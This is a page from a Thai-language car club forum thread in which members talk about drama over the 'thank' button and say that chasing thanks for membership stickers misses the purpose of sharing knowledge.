พุธ, 13 มิถุนา 2012 19:01 - สำหรับคนที่สงสัยว่าทำไม THANKS ของ grandsesor ที่มี nutsiki กดให้ตลอด
เห็นหลายกระทู้แล้ว ที่เป็นดราม่าเพราะการกด thank ส่วนตัวผมแล้วเข้ามาหาความรู้จากบ้านหลังนี้ สิ่งใหนที่สามารถแบ่งปันให้กับสมาชิกคนอื่นๆได้ก็พยายามหามาแชร์กัน
แต่สิ่งนึงที่สำคัญผมคิดว่าการที่ได้เป็นสมาชิก es ตัวจริงจากการปั่นกระทู้ไล่ล่า thank ผมว่ามันไม่ไช่แก่นแท้ ถึงผมจะไม่ได้เป็นสมาชิก ไม่ได้สติกเกอร์ แต่ผมก็ภูมิใจที่ได้เป็นส่วนหนึ่งของสังคมเล็กๆนี้ ที่สำคัญจำนวน thank แต่ละครั้งที่ผมได้รับ ผมภูมิใจกับมันทุกครั้งครับ
ปล.ไม่ได้ว่าใครนะครับ เป็นความรู้สึกส่วนตัวจริงๆ
nawintar

ชื่อเล่น: ต้าร์

เข้าร่วม: 08 พฤศจิกา 2009
ตอบ: 1383

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 285
ให้คำขอบคุณ: 64

พุธ, 13 มิถุนา 2012 20:55 - สำหรับคนที่สงสัยว่าทำไม THANKS ของ grandsesor ที่มี nutsiki กดให้ตลอด
มีปัญหาตลอดเรื่อง thank เนี่ย ผมอยู่มา2ปีแหละ ด้าย thank เกินกว่าที่จาด้ายสติ๊กเกอร์ โดนลบ thank ก้อหลายครั้ง ยังไม่เห็นเดือดร้อนเลย
ถามตัวเองดีกว่าว่าที่เราสมัครเข้ามาเพื่ออะไร เพื่อเป็นฐานข้อมูลหรือเพื่อมาเอาสติ๊กเกอร์
ได้รับคำขอบคุณจาก: honeybeex7  psYchosis 
ตอบ
หน้า 2 จาก 3
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.